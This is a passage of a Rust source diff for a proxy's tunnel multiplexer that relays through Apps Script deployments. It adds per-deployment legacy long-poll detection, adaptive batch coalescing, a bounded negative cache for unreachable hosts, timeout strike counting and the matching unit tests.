Recomputed under `legacy_deployments`'s mutex on + /// every mark/expire and read with a relaxed load from `tunnel_loop`. + /// True only when this process has fast-empty observations for *all* + /// `num_scripts` deployments simultaneously — that's when the per- + /// session 30 s read-timeout backoff (the only setting where there is + /// no per-deployment alternative) is still appropriate. Invariant: the + /// atomic is always written *after* the map insert, under the same + /// lock, so any reader that sees `true` was preceded by a complete + /// map update. + all_legacy: Arc, + /// Count of *unique* configured deployment IDs at start time. + /// Snapshotted from `fronter.script_id_list()` deduped, since the + /// aggregate gate compares this against `legacy_deployments.len()` + /// (a HashMap, so unique-keyed) — using the raw configured count + /// would make the gate unreachable whenever a user lists the same + /// script_id twice. Blacklisted-but-configured deployments still + /// count here; see `all_servers_legacy` for why. + num_scripts: usize, /// Pre-read observability. Lets an operator see whether the 50 ms /// wait-for-first-bytes is pulling its weight: /// * `preread_win` — client sent bytes in time, bundled with connect @@ -149,28 +244,57 @@ pub struct TunnelMux { /// Separate monotonic counter used only to trigger the summary log /// (avoids a race where two threads both see `total % 100 == 0`). preread_total_events: AtomicU64, + /// Short-lived negative cache for targets the tunnel-node reported as + /// unreachable (`Network is unreachable` / `No route to host`). Keyed by + /// `(host, port)`, value is the expiry instant. Plain Mutex is + /// fine: it's touched once per CONNECT (cheap) and once per failure. 
+ unreachable_cache: Mutex>, } impl TunnelMux { - pub fn start(fronter: Arc) -> Arc { - let n = fronter.num_scripts(); + pub fn start(fronter: Arc, coalesce_step_ms: u64, coalesce_max_ms: u64) -> Arc { + // Dedupe before snapshotting: the aggregate `all_legacy` gate + // compares `legacy_deployments.len()` (a HashMap, so unique + // keys) against this count, so using the raw `num_scripts()` + // would make the gate unreachable whenever a user lists the + // same script_id twice in config. + let unique: std::collections::HashSet<&str> = fronter + .script_id_list() + .iter() + .map(String::as_str) + .collect(); + let unique_n = unique.len(); + let raw_n = fronter.num_scripts(); + if unique_n != raw_n { + tracing::warn!( + "tunnel mux: {} deployments configured but only {} unique script_id(s) — duplicate entries ignored for legacy detection", + raw_n, + unique_n, + ); + } tracing::info!( "tunnel mux: {} deployment(s), {} concurrent per deployment", - n, + unique_n, CONCURRENCY_PER_DEPLOYMENT ); + let step = if coalesce_step_ms > 0 { coalesce_step_ms } else { DEFAULT_COALESCE_STEP_MS }; + let max = if coalesce_max_ms > 0 { coalesce_max_ms } else { DEFAULT_COALESCE_MAX_MS }; + tracing::info!("batch coalesce: step={}ms max={}ms", step, max); let (tx, rx) = mpsc::channel(512); - tokio::spawn(mux_loop(rx, fronter)); + tokio::spawn(mux_loop(rx, fronter, step, max)); Arc::new(Self { tx, connect_data_unsupported: Arc::new(AtomicBool::new(false)), - server_no_longpoll: Arc::new(AtomicBool::new(false)), + legacy_deployments: Mutex::new(HashMap::new()), + all_legacy: Arc::new(AtomicBool::new(false)), + num_scripts: unique_n, preread_win: AtomicU64::new(0), preread_loss: AtomicU64::new(0), preread_skip_port: AtomicU64::new(0), preread_skip_unsupported: AtomicU64::new(0), preread_win_total_us: AtomicU64::new(0), preread_total_events: AtomicU64::new(0), + unreachable_cache: Mutex::new(HashMap::new()), }) } @@ -193,7 +317,8 @@ impl TunnelMux { }) .await; match reply_rx.await { - 
Ok(r) => r, + Ok(Ok((resp, _script_id))) => Ok(resp), + Ok(Err(e)) => Err(e), Err(_) => Err("mux channel closed".into()), } } @@ -207,7 +332,8 @@ impl TunnelMux { }) .await; match reply_rx.await { - Ok(r) => r, + Ok(Ok((resp, _script_id))) => Ok(resp), + Ok(Err(e)) => Err(e), Err(_) => Err("mux channel closed".into()), } } @@ -231,19 +357,147 @@ impl TunnelMux { } } - fn server_no_longpoll(&self) -> bool { - self.server_no_longpoll.load(Ordering::Relaxed) + /// True only when *every* known deployment is currently in legacy + /// mode. Both per-session decisions in `tunnel_loop` (the 30 s + /// read-timeout backoff and the skip-empty-when-idle short-circuit) + /// gate on this aggregate — they can't pick a per-deployment answer + /// ahead of time because the next op's deployment is chosen by + /// `next_script_id()` only when the batch fires. With one + /// long-poll-capable peer still around, the loop must keep emitting + /// empty polls so round-robin lands some on that peer (where the + /// server can hold them open and deliver pushed bytes). + /// + /// Known limitation: the comparison is against *all configured* + /// deployments (`num_scripts`), not currently-selectable ones. A + /// fleet where most deployments are blacklisted in `DomainFronter` + /// (10 min cooldown) and the only selectable deployment(s) are + /// legacy will keep the fast cadence for up to that cooldown, even + /// though every reachable peer is legacy. Accepted because + /// integrating the blacklist would require a hot-path query on the + /// fronter's mutex once per `tunnel_loop` iteration; a heavily- + /// blacklisted fleet has bigger problems than quota optimization, + /// and the worst-case quota cost is bounded by the cooldown. + /// + /// Hot path: lock-free relaxed load. 
If the cached value is `true`, + /// double-check under the mutex with a sweep for expired entries — + /// otherwise stale legacy marks would keep us in the slow path forever + /// after every deployment recovers (the `mark_server_no_longpoll` sweep + /// only fires on the next mark, which may never come). + fn all_servers_legacy(&self) -> bool { + if !self.all_legacy.load(Ordering::Relaxed) { + return false; + } + let now = Instant::now(); + let mut deps = match self.legacy_deployments.lock() { + Ok(g) => g, + Err(p) => p.into_inner(), + }; + deps.retain(|_, marked_at| now.duration_since(*marked_at) < LEGACY_RECOVER_AFTER); + let still_all = deps.len() == self.num_scripts; + if !still_all { + self.all_legacy.store(false, Ordering::Relaxed); + } + still_all } - fn mark_server_no_longpoll(&self) { - if !self.server_no_longpoll.swap(true, Ordering::Relaxed) { + fn mark_server_no_longpoll(&self, script_id: &str) { + let now = Instant::now(); + let mut deps = match self.legacy_deployments.lock() { + Ok(g) => g, + Err(p) => p.into_inner(), + }; + // Inline expiry sweep: if any entry has aged past + // LEGACY_RECOVER_AFTER, drop it before recomputing `all_legacy`. + // Without this, an entry that should have recovered would still + // count toward the aggregate. + deps.retain(|_, marked_at| now.duration_since(*marked_at) < LEGACY_RECOVER_AFTER); + let was_present = deps.contains_key(script_id); + deps.insert(script_id.to_string(), now); + let all = deps.len() == self.num_scripts; + // Atomic written under the lock and *after* the map insert. Any + // reader that observes `all_legacy = true` has seen a complete + // map state where every deployment is marked. + self.all_legacy.store(all, Ordering::Relaxed); + drop(deps); + // Only log on first-mark-for-this-cycle: after `LEGACY_RECOVER_AFTER` + // expiry + re-detection we re-log, which is intentional — that's + // a real signal that the deployment regressed back to legacy mode. 
+ if !was_present { + let short = &script_id[..script_id.len().min(8)]; tracing::warn!( - "tunnel-node returned an empty poll faster than {:?}; assuming legacy (no long-poll) drain — falling back to skip-empty-when-idle to avoid quota waste", + "tunnel-node deployment {}... returned an empty poll faster than {:?}; assuming legacy (no long-poll) drain — this deployment will skip empty polls when idle for the next {:?}", + short, LEGACY_DETECT_THRESHOLD, + LEGACY_RECOVER_AFTER, ); } } + /// Returns true if `(host, port)` has a non-expired unreachable entry. + /// The proxy front-end uses this to skip the tunnel and reply + /// "host unreachable" immediately on follow-up CONNECTs. + pub fn is_unreachable(&self, host: &str, port: u16) -> bool { + let now = Instant::now(); + let mut cache = match self.unreachable_cache.lock() { + Ok(g) => g, + Err(p) => p.into_inner(), + }; + let key = (normalize_cache_host(host), port); + match cache.get(&key) { + Some(expiry) if *expiry > now => true, + Some(_) => { + cache.remove(&key); + false + } + None => false, + } + } + + /// If `err` looks like a network-unreachable / no-route-to-host error + /// from the tunnel-node, remember the target for `UNREACHABLE_CACHE_TTL`. + /// No-op for any other error (timeouts, refused, EOF, etc.) — those can + /// be transient and we don't want to lock out a host on a flaky moment. + fn record_unreachable_if_match(&self, host: &str, port: u16, err: &str) { + if !is_unreachable_error_str(err) { + return; + } + let mut cache = match self.unreachable_cache.lock() { + Ok(g) => g, + Err(p) => p.into_inner(), + }; + // Cap enforcement is two-stage: first drop anything already expired, + // then if we're STILL at/above the cap (i.e. an unbounded burst of + // unique unreachable hosts within the TTL), evict the entry that + // would expire soonest. This bounds the map size at all times — a + // pure `retain` on expiry alone would let the map grow unbounded + // until the first entry's TTL elapses. 
+ if cache.len() >= UNREACHABLE_CACHE_MAX { + let now = Instant::now(); + cache.retain(|_, expiry| *expiry > now); + while cache.len() >= UNREACHABLE_CACHE_MAX { + let victim = cache + .iter() + .min_by_key(|(_, expiry)| **expiry) + .map(|(k, _)| k.clone()); + match victim { + Some(k) => { + cache.remove(&k); + } + None => break, + } + } + } + let key = (normalize_cache_host(host), port); + cache.insert(key, Instant::now() + UNREACHABLE_CACHE_TTL); + tracing::debug!( + "negative-cached {}:{} for {:?} ({})", + host, + port, + UNREACHABLE_CACHE_TTL, + err + ); + } + fn record_preread_win(&self, port: u16, elapsed: Duration) { self.preread_win.fetch_add(1, Ordering::Relaxed); self.preread_win_total_us @@ -302,7 +556,9 @@ impl TunnelMux { } } -async fn mux_loop(mut rx: mpsc::Receiver, fronter: Arc) { +async fn mux_loop(mut rx: mpsc::Receiver, fronter: Arc, coalesce_step_ms: u64, coalesce_max_ms: u64) { + let coalesce_step = Duration::from_millis(coalesce_step_ms); + let coalesce_max = Duration::from_millis(coalesce_max_ms); // One semaphore per deployment ID, each allowing 30 concurrent requests. let sems: Arc>> = Arc::new( fronter @@ -319,19 +575,42 @@ async fn mux_loop(mut rx: mpsc::Receiver, fronter: Arc) { loop { let mut msgs = Vec::new(); - match tokio::time::timeout(Duration::from_millis(30), rx.recv()).await { - Ok(Some(msg)) => msgs.push(msg), - Ok(None) => break, - Err(_) => continue, + // Block on the first message — no point waking up to find an empty + // queue. Once the first op lands, the adaptive coalesce loop waits + // in `coalesce_step` increments (resetting on each new arrival, up + // to `coalesce_max`) so concurrent ops land in the same batch. 
+ match rx.recv().await { + Some(msg) => msgs.push(msg), + None => break, } - while let Ok(msg) = rx.try_recv() { - msgs.push(msg); + let hard_deadline = tokio::time::Instant::now() + coalesce_max; + let mut soft_deadline = tokio::time::Instant::now() + coalesce_step; + loop { + // Drain anything that's already queued without waiting. + while let Ok(msg) = rx.try_recv() { + msgs.push(msg); + // Reset the soft deadline — more ops are arriving. + soft_deadline = tokio::time::Instant::now() + coalesce_step; + } + let now = tokio::time::Instant::now(); + let wait_until = soft_deadline.min(hard_deadline); + if now >= wait_until { + break; + } + match tokio::time::timeout(wait_until - now, rx.recv()).await { + Ok(Some(msg)) => { + msgs.push(msg); + // New op arrived — extend the soft deadline. + soft_deadline = tokio::time::Instant::now() + coalesce_step; + } + Ok(None) => return, + Err(_) => break, // soft or hard deadline hit, no more ops + } } // Split: plain connects go parallel, data-bearing ops get batched. let mut data_ops: Vec = Vec::new(); - let mut data_replies: Vec<(usize, oneshot::Sender>)> = - Vec::new(); + let mut data_replies: Vec<(usize, BatchedReply)> = Vec::new(); let mut close_sids: Vec = Vec::new(); let mut batch_payload_bytes: usize = 0; @@ -527,7 +806,7 @@ async fn fire_batch( sems: &Arc>>, fronter: &Arc, data_ops: Vec, - data_replies: Vec<(usize, oneshot::Sender>)>, + data_replies: Vec<(usize, BatchedReply)>, ) { let script_id = fronter.next_script_id(); let sem = sems @@ -542,10 +821,12 @@ async fn fire_batch( let t0 = std::time::Instant::now(); let n_ops = data_ops.len(); - // Bounded-wait: if the batch takes longer than BATCH_TIMEOUT, - // all sessions in this batch get an error and can retry. + // Bounded-wait: if the batch takes longer than the configured + // batch timeout (Config::request_timeout_secs), all sessions in + // this batch get an error and can retry. 
+        let batch_timeout = f.batch_timeout();
         let result = tokio::time::timeout(
-            BATCH_TIMEOUT,
+            batch_timeout,
             f.tunnel_batch_request_to(&script_id, &data_ops),
         )
         .await;
@@ -558,23 +839,111 @@
         match result {
             Ok(Ok(batch_resp)) => {
+                f.record_batch_success(&script_id);
+                // Wire the Full-mode usage counter that #230 / #362 flagged
+                // as stuck-at-zero. Each successful batch is one
+                // `UrlFetchApp.fetch()` call against the deploying Google
+                // account's daily quota — bytes-counted is the inbound JSON
+                // response which is the closest analogue to the apps_script
+                // path's `record_today(bytes_received)` (we don't have the
+                // exact response byte count post-deserialize, so we use a
+                // proxy: sum of per-session response payload bytes the
+                // batch carried back). Underestimates by JSON envelope
+                // overhead but is in the right order of magnitude.
+                let response_bytes: u64 = batch_resp
+                    .r
+                    .iter()
+                    .map(|r| {
+                        // `d` carries TCP payload (base64 string len ≈
+                        // 4/3 of decoded bytes; close enough); `pkts`
+                        // carries UDP datagrams (each base64); plus any
+                        // error string. Sum gives a stable proxy for
+                        // "how much did this batch move."
+                        let d = r.d.as_ref().map(|s| s.len() as u64).unwrap_or(0);
+                        let pkts = r
+                            .pkts
+                            .as_ref()
+                            .map(|v| v.iter().map(|p| p.len() as u64).sum::<u64>())
+                            .unwrap_or(0);
+                        d + pkts
+                    })
+                    .sum();
+                f.record_today(response_bytes);
+                let sid_short = &script_id[..script_id.len().min(8)];
                 for (idx, reply) in data_replies {
                     if let Some(resp) = batch_resp.r.get(idx) {
-                        let _ = reply.send(Ok(resp.clone()));
+                        let _ = reply.send(Ok((resp.clone(), script_id.clone())));
                     } else {
-                        let _ = reply.send(Err("missing response in batch".into()));
+                        let _ = reply.send(Err(format!(
+                            "missing response in batch from script {}",
+                            sid_short
+                        )));
                     }
                 }
             }
             Ok(Err(e)) => {
+                // Read-side timeout from `domain_fronter`: Apps Script didn't
+                // start streaming response bytes within the per-read deadline.
+ // Common cause: deployment's `TUNNEL_SERVER_URL` points at a + // dead host, so UrlFetchApp inside Apps Script hangs until its + // own internal connect timeout. Strike-counter blacklists the + // deployment after a sustained pattern. + if matches!(e, FronterError::Timeout) { + f.record_timeout_strike(&script_id); + } let err_msg = format!("{}", e); - tracing::warn!("batch failed: {}", err_msg); + let sid_short = &script_id[..script_id.len().min(8)]; + // Detect the body string we ship as the v1.8.0 bad-auth + // decoy. v1.8.1 asserted "AUTH_KEY mismatch" outright, but + // #404 (w0l4i) found the same body comes back from Apps + // Script in 3 other unrelated cases too: + // + // 1. AUTH_KEY mismatch — our intentional decoy + // 2. Apps Script execution timeout/ — runtime hit 6-min + // mid-call quota tear cap or per-100s quota + // 3. Apps Script internal hiccup — Google-side flake, + // serves placeholder + // 4. ISP-side response truncation — #313 pattern, the + // response was assembled + // but ate an RST mid-flight + // + // So we surface all four candidates instead of asserting #1. + // Users can flip DIAGNOSTIC_MODE=true in Code.gs to disambiguate: + // only #1 still returns the decoy in diagnostic mode; the + // others return real JSON or different errors. + if err_msg.contains("The script completed but did not return anything") { + tracing::error!( + "batch failed (script {}): got the v1.8.0 decoy/placeholder body — \ + could be (1) AUTH_KEY mismatch between mhrv-rs config and Code.gs \ + (run a direct curl probe against the deployment to verify), \ + (2) Apps Script execution timeout or per-100s quota tear (try \ + lowering parallel_concurrency in config), (3) Apps Script \ + internal hiccup (transient, retry next batch), or (4) ISP-side \ + response truncation (#313 pattern, try a different google_ip). 
\ + To distinguish (1) from the rest: set DIAGNOSTIC_MODE=true at \ + the top of Code.gs + redeploy as new version — only AUTH_KEY \ + mismatch returns this body in diagnostic mode.", + sid_short + ); + } else { + tracing::warn!("batch failed (script {}): {}", sid_short, err_msg); + } for (_, reply) in data_replies { let _ = reply.send(Err(err_msg.clone())); } } Err(_) => { - tracing::warn!("batch timed out after {:?} ({} ops)", BATCH_TIMEOUT, n_ops); + // Whole-batch budget elapsed. Even stronger signal than a + // per-read timeout — count it the same way so a truly-stuck + // deployment exits round-robin fast. + f.record_timeout_strike(&script_id); + let sid_short = &script_id[..script_id.len().min(8)]; + tracing::warn!( + "batch timed out after {:?} (script {}, {} ops)", + batch_timeout, + sid_short, + n_ops + ); for (_, reply) in data_replies { let _ = reply.send(Err("batch timed out".into())); } @@ -697,6 +1066,11 @@ async fn connect_plain(host: &str, port: u16, mux: &Arc) -> std::io:: Ok(Ok(resp)) => { if let Some(ref e) = resp.e { tracing::error!("tunnel connect error for {}:{}: {}", host, port, e); + // Only cache here: `resp.e` is the tunnel-node's own connect() + // result against the target. The outer `Ok(Err(_))` arm below + // is a transport-level failure (relay → Apps Script → tunnel- + // node never reached) and tells us nothing about the target. 
+ mux.record_unreachable_if_match(host, port, e); return Err(std::io::Error::new( std::io::ErrorKind::ConnectionRefused, e.clone(), @@ -736,13 +1110,16 @@ async fn connect_with_initial_data( .await; let resp = match reply_rx.await { - Ok(Ok(resp)) => resp, + Ok(Ok((resp, _script_id))) => resp, Ok(Err(e)) => { if is_connect_data_unsupported_error_str(&e) { tracing::debug!("connect_data unsupported for {}:{}: {}", host, port, e); return Ok(ConnectDataOutcome::Unsupported); } tracing::error!("tunnel connect_data error for {}:{}: {}", host, port, e); + // Outer transport failure (relay/Apps Script never reached the + // tunnel-node). Don't poison the destination cache from here — + // see `connect_plain` for the same reasoning. return Err(std::io::Error::new( std::io::ErrorKind::ConnectionRefused, e, @@ -768,6 +1145,8 @@ async fn connect_with_initial_data( if let Some(ref e) = resp.e { tracing::error!("tunnel connect_data error for {}:{}: {}", host, port, e); + // `resp.e` is the tunnel-node's own connect result — cache it. + mux.record_unreachable_if_match(host, port, e); return Err(std::io::Error::new( std::io::ErrorKind::ConnectionRefused, e.clone(), @@ -834,18 +1213,30 @@ async fn tunnel_loop( // drains. With long-poll, the server holds empty polls open up // to its `LONGPOLL_DEADLINE` (~5 s currently), so the client // can keep this read timeout short — the wait is on the wire, - // not here. Against a *legacy* tunnel-node (no long-poll, fast + // not here. Against *legacy* tunnel-nodes (no long-poll, fast // empty replies), the same short cadence + always-poll behavior // would generate continuous round-trips on idle sessions and - // burn Apps Script quota. The `server_no_longpoll` flag detects - // the legacy case from reply latency below and reverts to the - // pre-long-poll cadence: long sleep on local read, skip empty - // polls when sustained-idle. - let legacy_mode = mux.server_no_longpoll(); + // burn Apps Script quota. 
+ // + // Both the read timeout and the skip-empty-when-idle decision + // are gated on `all_legacy` — i.e. *every known deployment is + // currently legacy*. Per-deployment "skip when this script is + // legacy" sounds appealing but is unsafe: the next op's + // deployment is chosen by `next_script_id()` only when the + // batch fires, so the loop can't predict where the empty poll + // will land. Suppressing polls based on the *previous* reply's + // script would stall remote→client data on mixed setups — + // round-robin would never reach the long-poll-capable peer for + // this session if every iteration short-circuits before + // sending. Cost of the conservative gate: legacy peers see + // some wasted empty polls when at least one peer is healthy, + // bounded by round-robin fan-out. Worth it to keep pushed + // bytes flowing. + let all_legacy = mux.all_servers_legacy(); let client_data = if let Some(data) = pending_client_data.take() { Some(data) } else { - let read_timeout = match (legacy_mode, consecutive_empty) { + let read_timeout = match (all_legacy, consecutive_empty) { (_, 0) => Duration::from_millis(20), (_, 1) => Duration::from_millis(80), (_, 2) => Duration::from_millis(200), @@ -864,13 +1255,13 @@ async fn tunnel_loop( } }; - // Legacy-server skip: against a non-long-polling tunnel-node, - // an empty poll is wasted work — fast-empty reply, no push - // delivery benefit. Preserve the pre-long-poll behavior of - // going quiet after a few empties. Long-poll-capable servers - // skip this branch and always send the empty op so the server - // can hold it open. - if legacy_mode && client_data.is_none() && consecutive_empty > 3 { + // Skip empty polls only when *every* deployment is legacy. With + // even one long-poll-capable peer, round-robin will land some + // empty polls there where the server holds them open and can + // deliver pushed bytes — that's the whole point of long-poll, + // so we must keep emitting. 
See the `all_legacy` comment above + // for why a per-deployment gate here would stall mixed setups. + if all_legacy && client_data.is_none() && consecutive_empty > 3 { continue; } @@ -889,8 +1280,8 @@ async fn tunnel_loop( // Bounded-wait on reply: if the batch this op landed in is slow // (dead target on the tunnel-node side), don't block this session // forever — timeout and let it retry on the next tick. - let resp = match tokio::time::timeout(REPLY_TIMEOUT, reply_rx).await { - Ok(Ok(Ok(r))) => r, + let (resp, script_id) = match tokio::time::timeout(REPLY_TIMEOUT, reply_rx).await { + Ok(Ok(Ok((r, sid_used)))) => (r, sid_used), Ok(Ok(Err(e))) => { tracing::debug!("tunnel data error: {}", e); break; @@ -903,18 +1294,18 @@ async fn tunnel_loop( } }; - // Legacy-server detection: an empty-in/empty-out round trip - // that finishes well under `LEGACY_DETECT_THRESHOLD` is + // Per-deployment legacy detection: an empty-in/empty-out round + // trip that finishes well under `LEGACY_DETECT_THRESHOLD` is // structurally impossible on a long-poll-capable tunnel-node // (the server holds the response either until data arrives or - // until its long-poll deadline). One observation flips the - // sticky flag for the rest of this process. Skip the check - // once already in legacy mode — the comparison is cheap, but - // calling `mark_server_no_longpoll` repeatedly muddies logs. - if !legacy_mode && was_empty_poll { + // until its long-poll deadline). One observation marks *this + // specific* deployment as legacy for `LEGACY_RECOVER_AFTER`; + // peers stay on the fast path. The aggregate `all_legacy` gate + // only flips once *every* deployment has been so marked. 
+ if was_empty_poll { let reply_was_empty = resp.d.as_deref().map(str::is_empty).unwrap_or(true); if reply_was_empty && send_at.elapsed() < LEGACY_DETECT_THRESHOLD { - mux.mark_server_no_longpoll(); + mux.mark_server_no_longpoll(&script_id); } } @@ -1069,6 +1460,133 @@ mod tests { ))); } + #[test] + fn unreachable_error_str_matches_expected_variants() { + assert!(is_unreachable_error_str( + "connect failed: Network is unreachable (os error 101)" + )); + assert!(is_unreachable_error_str("No route to host")); + assert!(is_unreachable_error_str("os error 113")); + // Case-insensitive. + assert!(is_unreachable_error_str( + "CONNECT FAILED: NETWORK IS UNREACHABLE" + )); + } + + #[test] + fn unreachable_error_str_rejects_unrelated() { + assert!(!is_unreachable_error_str("connection refused")); + assert!(!is_unreachable_error_str("connect timed out")); + assert!(!is_unreachable_error_str("connection reset by peer")); + assert!(!is_unreachable_error_str("")); + } + + #[test] + fn negative_cache_records_and_short_circuits() { + let (mux, _rx) = mux_for_test(); + // Initially nothing is cached. + assert!(!mux.is_unreachable("ds6.probe.example", 443)); + // Record a matching error. + mux.record_unreachable_if_match( + "ds6.probe.example", + 443, + "connect failed: Network is unreachable (os error 101)", + ); + assert!(mux.is_unreachable("ds6.probe.example", 443)); + // A different port for the same host is its own entry. + assert!(!mux.is_unreachable("ds6.probe.example", 80)); + } + + #[test] + fn negative_cache_ignores_non_unreachable_errors() { + let (mux, _rx) = mux_for_test(); + mux.record_unreachable_if_match( + "example.com", + 443, + "connect failed: connection refused", + ); + assert!(!mux.is_unreachable("example.com", 443)); + } + + #[test] + fn negative_cache_normalizes_host_keys() { + let (mux, _rx) = mux_for_test(); + // Cache under one casing/format... 
+ mux.record_unreachable_if_match( + "Example.COM.", + 443, + "Network is unreachable (os error 101)", + ); + // ...and look up under several equivalent forms. + assert!(mux.is_unreachable("example.com", 443)); + assert!(mux.is_unreachable("EXAMPLE.com", 443)); + assert!(mux.is_unreachable("example.com.", 443)); + // Different host should still miss. + assert!(!mux.is_unreachable("other.com", 443)); + } + + /// Outer `Ok(Err(_))` from the mux channel means "the relay never + /// reached the tunnel-node" (HTTP/TLS to Apps Script failed, batch + /// timed out, etc.) — the destination wasn't even attempted. Even if + /// that error string contains "Network is unreachable" (e.g. the + /// client device's WAN was momentarily down), it must NOT poison the + /// destination cache, or every host the user touched during a + /// connectivity blip stays refused for 30s. + #[tokio::test] + async fn negative_cache_skips_outer_relay_errors() { + let (mux, mut rx) = mux_for_test(); + let mux_for_task = mux.clone(); + let task = tokio::spawn(async move { + connect_plain("real.target.example", 443, &mux_for_task).await + }); + + // Receive the Connect msg and reply with an outer Err whose string + // would otherwise match `is_unreachable_error_str`. + let msg = rx.recv().await.expect("connect msg"); + let reply = match msg { + MuxMsg::Connect { reply, .. } => reply, + other => panic!("expected Connect, got {:?}", std::mem::discriminant(&other)), + }; + let _ = reply.send(Err( + "relay failed: Network is unreachable (os error 101)".into(), + )); + + let res = task.await.expect("task"); + assert!(res.is_err(), "connect_plain should surface the error"); + assert!( + !mux.is_unreachable("real.target.example", 443), + "outer relay error must not negative-cache the destination" + ); + } + + #[test] + fn negative_cache_enforces_hard_cap_under_unique_burst() { + let (mux, _rx) = mux_for_test(); + // Insert enough unique still-live entries to exceed the cap. 
The + // map size must never exceed UNREACHABLE_CACHE_MAX, even though + // every entry is fresh and `retain(expired)` prunes nothing. + let burst = UNREACHABLE_CACHE_MAX + 50; + for i in 0..burst { + let host = format!("h{}.example", i); + mux.record_unreachable_if_match( + &host, + 443, + "connect failed: Network is unreachable (os error 101)", + ); + } + let len = mux + .unreachable_cache + .lock() + .map(|g| g.len()) + .unwrap_or(0); + assert!( + len <= UNREACHABLE_CACHE_MAX, + "cache size {} exceeded cap {}", + len, + UNREACHABLE_CACHE_MAX + ); + } + #[test] fn server_speaks_first_covers_common_protocols() { for p in [21u16, 22, 25, 80, 110, 143, 587] { @@ -1091,17 +1609,28 @@ mod tests { /// than wired to a real DomainFronter. Lets tests assert what messages /// the client would emit without needing network or apps_script. fn mux_for_test() -> (Arc, mpsc::Receiver) { + mux_for_test_with(2) + } + + /// Build a TunnelMux for tests with a specific deployment count. The + /// per-deployment legacy state's aggregate gate (`all_servers_legacy`) + /// requires `legacy_deployments.len() == num_scripts`, so tests that + /// exercise that gate need to control how many "deployments" exist. 
+ fn mux_for_test_with(num_scripts: usize) -> (Arc, mpsc::Receiver) { let (tx, rx) = mpsc::channel(16); let mux = Arc::new(TunnelMux { tx, connect_data_unsupported: Arc::new(AtomicBool::new(false)), - server_no_longpoll: Arc::new(AtomicBool::new(false)), + legacy_deployments: Mutex::new(HashMap::new()), + all_legacy: Arc::new(AtomicBool::new(false)), + num_scripts, preread_win: AtomicU64::new(0), preread_loss: AtomicU64::new(0), preread_skip_port: AtomicU64::new(0), preread_skip_unsupported: AtomicU64::new(0), preread_win_total_us: AtomicU64::new(0), preread_total_events: AtomicU64::new(0), + unreachable_cache: Mutex::new(HashMap::new()), }); (mux, rx) } @@ -1144,14 +1673,17 @@ mod tests { assert_eq!(sid, "sid-under-test"); assert_eq!(&data[..], b"CLIENTHELLO"); // Reply with eof so tunnel_loop unwinds cleanly. - let _ = reply.send(Ok(TunnelResponse { - sid: Some("sid-under-test".into()), - d: None, - pkts: None, - eof: Some(true), - e: None, - code: None, - })); + let _ = reply.send(Ok(( + TunnelResponse { + sid: Some("sid-under-test".into()), + d: None, + pkts: None, + eof: Some(true), + e: None, + code: None, + }, + "test-script".to_string(), + ))); } other => panic!( "first mux message was not Data (expected replay); got {:?}", @@ -1171,6 +1703,81 @@ mod tests { .expect("tunnel_loop did not exit after eof"); } + /// Regression for the mixed-mode stall: A is legacy, B is long-poll + /// capable, the session's last reply came from A. A naive per- + /// deployment skip (gated on the *previous* reply's `script_id`) + /// would short-circuit every empty poll on this session — so B + /// never gets a chance to long-poll for us, and remote→client data + /// stalls until either the local client sends bytes or A's TTL + /// expires. The fix gates skip-when-idle on the aggregate + /// `all_servers_legacy()` instead, so the loop keeps emitting empty + /// polls whenever at least one peer can still hold the request open. 
+ /// Replies are paced via `start_paused` time auto-advance — without + /// it the test would take ~2 s of real wall-clock time per session. + #[tokio::test(start_paused = true)] + async fn tunnel_loop_keeps_polling_when_only_some_deployments_legacy() { + use tokio::net::TcpListener; + + let listener = TcpListener::bind(("127.0.0.1", 0)).await.unwrap(); + let addr = listener.local_addr().unwrap(); + let accept = tokio::spawn(async move { listener.accept().await.unwrap().0 }); + let _client = TcpStream::connect(addr).await.unwrap(); + let mut server_side = accept.await.unwrap(); + + // 2 deployments, only A marked legacy → all_servers_legacy = false. + let (mux, mut rx) = mux_for_test_with(2); + mux.mark_server_no_longpoll("script-A"); + assert!(!mux.all_servers_legacy()); + + let loop_handle = tokio::spawn({ + let mux = mux.clone(); + async move { tunnel_loop(&mut server_side, "sid-mixed", &mux, None).await } + }); + + // Reply to 6 empty polls, all from A. With the regression + // (per-deployment skip on `last_script_id == A`), the loop would + // stop emitting at iteration 4 — `consecutive_empty > 3` plus + // `last_was_legacy` would short-circuit the send. With the fix, + // the aggregate gate stays false and the loop keeps polling. + // The 60 s timeout below is paused-time, so it only "elapses" + // if rx.recv() truly never resolves (i.e. the loop has stalled). 
+ for i in 0..6u32 { + let msg = tokio::time::timeout(Duration::from_secs(60), rx.recv()) + .await + .unwrap_or_else(|_| panic!( + "loop stopped emitting at iteration {} — regression: per-deployment skip-when-idle stalled session even though long-poll-capable peer was available", + i + )) + .expect("mux channel closed unexpectedly"); + match msg { + MuxMsg::Data { sid, data, reply } => { + assert_eq!(sid, "sid-mixed"); + assert!(data.is_empty(), "expected empty poll, got {} bytes", data.len()); + let last = i == 5; + let _ = reply.send(Ok(( + TunnelResponse { + sid: Some("sid-mixed".into()), + d: None, + pkts: None, + eof: if last { Some(true) } else { None }, + e: None, + code: None, + }, + "script-A".to_string(), + ))); + } + _ => panic!( + "iteration {}: expected Data poll, got a different MuxMsg variant", + i + ), + } + } + + let _ = tokio::time::timeout(Duration::from_secs(2), loop_handle) + .await + .expect("tunnel_loop did not exit after eof"); + } + /// Once `mark_connect_data_unsupported` is called, future sessions /// must see the flag — no per-session repeat of the detect-and-fallback /// cost. If this regresses, every new flow pays an extra round trip @@ -1185,19 +1792,109 @@ mod tests { assert!(mux.connect_data_unsupported()); } - /// `server_no_longpoll` must be sticky too: once we see a legacy - /// fast-empty reply, every subsequent session uses the legacy idle - /// cadence (long read timeout + skip-empty) for the rest of the - /// process. Flipping it back per-session would either thrash the - /// cadence or double the detection cost. + /// Marking deployment A as legacy must NOT make B look legacy. This + /// is the central guarantee of the per-deployment design: with the + /// old global AtomicBool, one slow / legacy deployment dragged every + /// session onto the 30 s legacy cadence even when the other 7 were + /// long-polling fine. 
